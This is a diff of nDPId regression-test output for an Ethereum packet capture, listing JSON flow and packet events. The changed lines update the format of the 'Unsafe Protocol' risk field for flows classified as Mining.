 01856{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1578508364519,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1097,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1097,"pkt_l4_len":1063,"ts_msec":1578508364519,"pkt":"KDc3AG3IEBMx8Tl2CABFAAQ7F1RAAC8RPN4D0S1PwKgBuHZfdl8EJ4PVaVYTvO9LrTk6yni9j9O4lLCx8c3w2iOwFQRksfASVhzN6T8K7lnXRwHY7v3+ONhElGFbYOffjDytd02o206R62nDNZ+LcEa5V5K9KHZQh029ihE8Ury3mI0LZjHE13ZDAAT5A7r5A7L4S4QjtPapgnZdgLhAO5qC1ATimkffsyZlSJIXGVIuxdFsM86E7cqAjFOnv\/8DXNCQHJBVJiDXoCE+xGUbCBkPCreAagxpFk0Kv5X\/6PhNhKUWayGCdl+Cdl+4QFK2HHRAlM9Mj+TxGD7ACVRZHZtB58hxcD+hW2XdmacQwMOkGeflfz3iQaCGa6bw7UpxurZYH9DtQSW8Gn+wiV74TYRZJmMignZfgnZfuEBNXexB6IZur6GByNXF5kqBGoYoINyuPaRzRT\/L\/XeZwo80a\/N6vMBtsgrq2ZF9h4G0sqa47Wg7uKDWSZtY6p\/o+E2EsoDD3IJ2X4J2X7hAE9D206tRuSrRWszd5+5PqyxrzPQHPgJ6M4jR3YAwA4SXyWoQd9UmDUgHBtsrr3UYDBX+DpI9ijrH8jmNKWfim\/hNhKLzoFOCdl+Cdl+4QFcgAb+wxvXRoA\/jZ6pZpvtWMqWRnDTAVCrWET9xUm+STSO+d5OO9wGG7pHu9I5ueUw\/fAd5lu3NtaUH9uwTgQX4TYQSilEcgnZfgnZfuEDrOA+HQ7eWMjwlUeqXlrKvkuj1DTxVelkYAtV5dglpnIhrBZIeo034r7N3OARecEoNp0x6OeeY\/TD1OnJUir9u+E2EMyY8T4J2X4J2X7hAjvDxlr5M7BUzw40ony1SnzUKukEALVTn0B8WrIdd1Y\/HWL6mkTC4nsoMDegX1FF++rFMqjeViKJkeSDvzXh7sPhNhChDkICCdl+Cdl+4QHLmnbcNhaAJxQnuC0km5NBqC0yHT\/O8y7iwbqWb3zIi\/JNBIGOytm1SPyhBCVXEAh08vp59waAp0Fl3XZsLDpX4TYTH56bignZggnZguEAmai5v1neViV7teAsEvO\/IJYfemYLf2+j3ix3twO4cHaO8DDPa+4MSEcEzAFsUx\/2pmlUPII1TqUXgDk2+EYuF+E2EMyZRtIJ2X4J2X7hAgHT+RrAG20B8DB\/bHPvQKm79m+Z0+BB1fJpuHmieLdFavNthxznxmL2TjLC2hF17uhr9nJ8lRGk+kyETydUasfhNhFKR3PmCdl+Cdl+4QN1yRfRd+2g8MnNCa1j1Cnr1GFpxy7vxkYduQKQx1cGeo9xW0LFVTR4sISMRFqTJvP1+kBDeZDQ7++taiTPWLVf4TYSfy1QfgnZfgnZfuEATr9aMDwnYcu1Ru9AfCYxf1j4pIYv3iEkEPcprByn6GaZXC692Pg7aNtJE7Ibn2jkRlWjrNM1fsvjqm9oBENLzhF4WIGA="}
 00999{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1578508364519,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":467,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":467,"pkt_l4_len":433,"ts_msec":1578508364519,"pkt":"KDc3AG3IEBMx8Tl2CABFAAHFF1VAAC8RP1MD0S1PwKgBuHZfdl8BsTR2htDCYwB7bPwVHRrppzCkGewLkUUNlB3jVcwKSsPl3PpRPPiYpogGSbVhGO6LOf+6vpmiVjQKuGK9fr9HzQor5V9uX7UyvZMEj8wMYsgT45Bz2Z7bdsQaazyQJOYgw3sXAAT5AUT5ATz4TYSi5B2ggnZfgnZfuEAwVdpN68jOobX+wHrrL2RH\/wK1ka2szeSJGHiHFFoNLEPxKwxFy33NRZ3ovPOnkwdh3qJaARUyaYeXnrMHfiPL+E2EpERrUoJ2YYJ2YbhAbVK4hBOIFxjMK61hoo+B2E1DFAGWystZDApZ1qWqMdGzPO6EtDCqKOy2kznyTf9sEf\/6IzNe3mDxF09nkCXqPPhNhCPpxYOCdl+Cdl+4QEyRwYHw012pKtGG4pX25QXUlp9AiY+SLu1l7sUn3fRNHZfvnNA3az+glcVdf8irWyfLyfxkF3pVP8czohGx7uH4TYTR+vDNgnZfgnZfuEDT1Pf73xy4M3qZSRLleOgEdgguFkAavHpg2I9RZUlU1ZSe7W107ts9v4ZrZs61PWJz3Pgt4YI56NsUnL8RZ7gNhF4WIGA="}
@@ -64,112 +64,112 @@
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1578508364565,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1578508364565,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGYC7AqAG4I570l90ndl+E\/i4wBuq8c4AQECzS\/AAAAQEICiLYlHo03AK8"}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1578508364566,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1578508364566,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGDf+ygMPcwKgBuHZf3TL4VGlQ8MrCSaAScSATXAAAAgQFrAQCCApfPQwNItiUTwEDAwc="}
 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1578508364566,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1578508364566,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGAgfAqAG4soDD3N0ydl\/wysJJ+FRpUYAQECyi6QAAAQEICiLYlHpfPQwN"}
-00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364522,"flow_last_seen":1578508364568,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":495,"flow_tot_l4_payload_len":495,"flow_avg_l4_payload_len":123,"midstream":0,"ts_msec":1578508364568,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.158.244.151","src_port":56615,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
-00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":35,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364568,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":546,"flow_tot_l4_payload_len":546,"flow_avg_l4_payload_len":136,"midstream":0,"ts_msec":1578508364568,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"178.128.195.220","src_port":56626,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364522,"flow_last_seen":1578508364568,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":495,"flow_tot_l4_payload_len":495,"flow_avg_l4_payload_len":123,"midstream":0,"ts_msec":1578508364568,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.158.244.151","src_port":56615,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":35,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364568,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":546,"flow_tot_l4_payload_len":546,"flow_avg_l4_payload_len":136,"midstream":0,"ts_msec":1578508364568,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"178.128.195.220","src_port":56626,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1578508364569,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1578508364569,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGyBNZJmMiwKgBuHZf3TAEAfQVmn8HEKAScSAQTQAAAgQFrAQCCApfmkPpItiUTwEDAwc="}
 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1578508364569,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1578508364569,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGvBvAqAG4WSZjIt0wdl+afwcQBAH0FoAQECyf1wAAAQEICiLYlH1fmkPp"}
-00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":38,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364571,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":473,"flow_tot_l4_payload_len":473,"flow_avg_l4_payload_len":118,"midstream":0,"ts_msec":1578508364571,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"89.38.99.34","src_port":56624,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":38,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364571,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":473,"flow_tot_l4_payload_len":473,"flow_avg_l4_payload_len":118,"midstream":0,"ts_msec":1578508364571,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"89.38.99.34","src_port":56624,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1578508364593,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1578508364593,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAACcGVuwi\/xdxwKgBuHZf3TMrXBsGHvlEKaAScSD3ewAAAgQFrAQCCAqnEIc7ItiUTwEDAwc="}
 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1578508364593,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1578508364593,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGPfTAqAG4Iv8Xcd0zdl8e+UQpK1wbB4AQECyG7wAAAQEICiLYlJSnEIc7"}
-00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":41,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":128,"midstream":0,"ts_msec":1578508364595,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"34.255.23.113","src_port":56627,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":41,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":128,"midstream":0,"ts_msec":1578508364595,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"34.255.23.113","src_port":56627,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
 01863{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":70,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1578508364631,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1099,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1099,"pkt_l4_len":1065,"ts_msec":1578508364631,"pkt":"KDc3AG3IEBMx8Tl2CABFAAQ9McxAACoRfjA056VswKgBuHZfdl8EKSMV0Tk6zLZQqYdPasDvQYAfjhJ8qeDK0iQF1oC6v4BIFO8Ukv4XviQf8O74kSNp590utu+\/aRkEwwpxoabIrzvIzmTnyJlNpeyfgvNPwLIyg8I+w4LWPa4MA\/W2\/Jap8zB7AAT5A7z5A7T4TYQS26efgnZfgnZfuEAwkgYgUPIi4WiJg+QLzg9wGMhxPAR7azw\/xSKBAPOQbQlR3L69+mdeoxh\/qQi76RfNXeauKXl5ICJHofVK35cH+E2EUt2AH4J2YIJ2YLhAIbpA\/cDFhpXtS\/hixQb3nA9r93xmFVARyWt8mvD62Q42RXQv9d4buwnSPqvoZ8VPM1tV452Mu7b1nW6WCZP3H\/hNhJBbeIeCdl+Cdl+4QHDcQogYDcUZvsmo9wM3ftVwQss5t6Xz7SYpcIe0QCLsJRPOe\/7IMshT7rIUH59Wvzm2VWBMciyHxs11tRtvlg74TYSyPgragnZfgnZfuECktuxNZlsAPCNrxc8drmg5UZJYYlgJcgwixi3dHcHaL+SmxYYPit8ZDD0AQGDBI97zkdb5Vg5h5AMJ3ltOege3+E2Esj4dt4J2X4J2X7hAbSf3keqm\/kX1w8mhO8tfUrHPkpEON98Bfi90NSvh60PrPxJjJwxphJtd9yYNAp6bvKKmXex+Pf1jNZwIZzl1LfhNhA3mbCqCdl+Cdl+4QOL5cPG1naCZem66zt1KAC6uDCfFoxJhecyNkCxirh\/KFEuDlQVcZ87QmYypugLnAbyvaDrG2A\/fgNNcBVjcu7P4TYS524U+gnZfgnZfuEAvzWrhvDjoXJOa\/ZdCbLgHiFuGktYvbPu1Kx0QfSszMjCe5P4b3hECkMlBLQo90CRjw1UcL0V+qQHcUkhH7ixE+E2ErGlePoJ2X4J2X7hAXGqY3uhYXKqMbPC9rcGcCUaWh+Dhi0uXFAXOGFtMr99hmG7UDnrqzTA\/o5MeRw5C1b8eG9l8GAevaeYZyFb6JfhNhLaioT2Cdl+Cdl+4QIU96ApVNnmCgofL7UIVwC0ussPQFE9BZpIkW9NYXxtm+4r+lcBEpjNfLr4w84vJM4LIgefP7wW0fAmtWWHpBj34TYRZo5RJgnklgnkluED1tj7tRebZlvZCTgHMIT8H0RpJXJ6gH+sJFUxXqZs38C\/hpzENTsCSDh1o2HUHvKg2FabU7+4S+HyXXU68T+Xi+E2EM01tNoLk1oLk1rhAfag2FjkUzZm46\/aJuVMW3oNNsPORtJDs86feqI9xjoUJ09giSja9nrnxBmA4a19j\/wmY0SxfQ5ijGeyrdMEjJvhNhCPk+oyCdl+Cdl+4QD9WPrST\/PNOA12+8bgX6kV4hJFBTbV9EgAQ6hcCTUo0f0CQNtNTkrUkC7hmmUaZ\/d9jh6CLjUr6pActojR+FlyEXhYgYA=="}
 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":83,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364632,"flow_last_seen":1578508364632,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1578508364632,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.38.60.79","src_port":56629,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1578508364632,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1578508364632,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGCOPAqAG4MyY8T901dl\/qiNMXAAAAALAC\/\/88YQAAAgQFtAEDAwUBAQgKItiUuAAAAAAEAgAA"}
 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":102,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1578508364646,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1578508364646,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADIGQxWi86BTwKgBuHZf3SW77REO6nqus6AScSAW9gAAAgQFrAQCCAp1Z9P7ItiUTwEDAwc="}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":103,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1578508364646,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1578508364646,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGNR3AqAG4ovOgU90ldl\/qeq6zu+0RD4AQECymNwAAAQEICiLYlMZ1Z9P7"}
-00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":104,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364522,"flow_last_seen":1578508364647,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":458,"flow_tot_l4_payload_len":458,"flow_avg_l4_payload_len":114,"midstream":0,"ts_msec":1578508364647,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"162.243.160.83","src_port":56613,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":104,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364522,"flow_last_seen":1578508364647,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":458,"flow_tot_l4_payload_len":458,"flow_avg_l4_payload_len":114,"midstream":0,"ts_msec":1578508364647,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"162.243.160.83","src_port":56613,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
 01868{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":105,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1578508364649,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1099,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1099,"pkt_l4_len":1065,"ts_msec":1578508364649,"pkt":"KDc3AG3IEBMx8Tl2CABFAAQ9Do1AACcR\/\/USimxDwKgBuHZfdl8EKXURHZU493PpfyH72WrYTKC\/rHcqyoxdJnlAGqx0IUPpfCDPrp1RbMe2PXXL\/Y0gUgYBHgBKX+LNKEC1qdxuKnvxvXevxKSr69S3rpBsxtD9oPpZta4nmfTh\/aybl9dDX7mZAQT5A7z5A7T4TYTKcBxqgnZfgnZfuECGOOF\/DUGQRmRtLD+gVTFTpr29WNtAkV6+wzvS1j2\/a652c2Up+3+CFGHvVHTbjE15jtDjeTNqp85aDPL\/y+3R+E2E1YVu74J6R4J6R7hACdquySb8h9bDyyzBVqIC4RVjIfrd43xNEhVl26cR8q+zCkRbVR7YOVOrP+cqMugQfvn+wj\/y\/7lEeLvwq\/902PhNhIpLq76Cdl+Cdl+4QPw+TE9tCaxzvKUZLrSUydGaIDt2Km6jvC1h7Hg9CIqQESMae7r6mkOxEncigdCNSYhdj\/fphc\/puhfvJzVEsBH4TYSd5phXgnZfgnZfuEBkLPllDdiGnUJSXb9oWAEuO01k9HXnM4R6tvd0I0GkOXQUhl2VOHTo9e2RsOThxTPe4UrR1rsnalRZskcUYP8N+E2EuRnM0YJv8YJv8bhAWtd39T3gGPqV5\/kAxth9r0Z21IwC3OO8ijNQxmi2ggVwJqg2W08zX0qhgUwFTxRZ7CbZwhQtBb9MNGyCEZnVqfhNhDOhFwyCdl+Cdl+4QK0vqa8HM5bIAwN2G4EpFPUp1DIN0fK8JdET2pxyCxTou65T7kwDQcRwG9J87PVp8UWu5zbalyVDTlzNuCAazd\/4TYQ0CYBEgnZfgnZfuEDgMt94d8TQv+3IGK5MVBJ+471CdMGgEuFgADFs\/sfR77hApAbinmLOWlg0KBI76fx3iPiGmIjPc2DjV6Y5S+dt+E2EI+XoE4J2X4J2X7hAIvfQZKlYQVCc0QQPwdirlpv8ThVD2qtJQ\/hHeZ\/oRum3Dym8iOrz0uJZ5KMKMAHJAax\/7cDcr+ygJhYzzSAsNPhNhBLbp5+Cdl+Cdl+4QDCSBiBQ8iLhaImD5AvOD3AYyHE8BHtrPD\/FIoEA85BtCVHcvr36Z16jGH+pCLvpF81d5q4peXkgIkeh9Urflwf4TYR82eu0gnZfgnZfuEBXvLisck0JGnGrgRqWL\/bDyJ8qsCwpUwM0sk3OmDN\/PU2NXINnOwgDzonj2zUWAZS5\/UZawhYcs8O8n12+UDva+E2EXN5bw4Jv8YJv8bhAmWLd+VP5u1ibBrgKagKp3py+njifftSzD32rmGG+J3QgFhiB28tAr4XUS33ESEXzhatHLB80xoRt5yzzOLxbKvhNhCPEd72CeRmCeRm4QEsv12Yq4nMYX4LQY5r9d7BNkGpNa1KOs2Gd6C4u3NZleL+d2v4Anfsu4uoql9o1Ksl2BdYCVg1KygwMa9DuSGuEXhYgYA=="}
 01006{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":106,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1578508364650,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":467,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":467,"pkt_l4_len":433,"ts_msec":1578508364650,"pkt":"KDc3AG3IEBMx8Tl2CABFAAHFDo5AACcRAm0SimxDwKgBuHZfdl8BsYIGz0wiJjKaUzFXr6IJm0KhJJHh14UxEkvPcQ\/Rk7Fgvbo\/feZhAIkP1PMVdfnmkT0ej4RbRZLeGs4r7KmIG\/NoSRob2DIRR9KSxxR5ApQK0GtL+DiOoUZ+LI2SWe0lCUL6AQT5AUT5ATz4TYSnR61sglIIglIIuEB7ukp3Oj6MzbNl3nDN0jQiNpC1V5v5rn9Rt7ZEw1VBzFla5k6rBHcylJhBRGAYzBX+17ncBsVtgVPJrKMh7nvV+E2EEop59oKMoIKMoLhASS3OSNDf3z8b3OyL7l\/Hx\/k821PEzINQHbZfniqNPVksrwSkp6jrG6UYCpQoXvgKZOetorWlposBzYkgatgcWfhNhDP\/TVmCdl2Cdl24QM3iC4E\/jtROh\/yrXbgvFZypcqA1E0NM1pmVBNhPzAEVOKwUDY19JR7HzoFwywH46oqp8Nqzrz5YKF3TzRCEzqb4TYS57vnMglLcglLcuECRN7VxzSUAEA2k0pdpV6OAanNBmMgqxX6AGOkM+qhp9apzS9PVbGdlMMSUUvnshxBsN5liOIkWGjzwRsyI7kXrhF4WIGA="}
 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":109,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364654,"flow_last_seen":1578508364654,"flow_idle_time":180000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":171,"midstream":0,"ts_msec":1578508364654,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"128.0.51.140","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":109,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1578508364654,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"ts_msec":1578508364654,"pkt":"EBMx8Tl2KDc3AG3ICABFAADHl8oAAEARbG\/AqAG4gAAzjHZfdl8AswwF15lp9gBLtC6IaCW33is1Th50j8UHjOmT4mAffcZn+yYEl4jGBnLnkKaeXePCjndUh79\/WTQA2R4kNex3KmtFmldicE1yJNj24ZecPC4hxpTcI9qIeMXPlU0BU5Rec0LcAQP4R7hAggEUSZWpWZm0YK3HCqZiBR7sHJ3wp8USPzyX73HGoWVqts4UjRd8TfDxZuCIPe7jI\/CXMWJB7l7pTCCyfJvg8YReFiBg"}
-00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":109,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364654,"flow_last_seen":1578508364654,"flow_idle_time":180000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":171,"midstream":0,"ts_msec":1578508364654,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"128.0.51.140","src_port":30303,"dst_port":30303,"l4_proto":"udp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
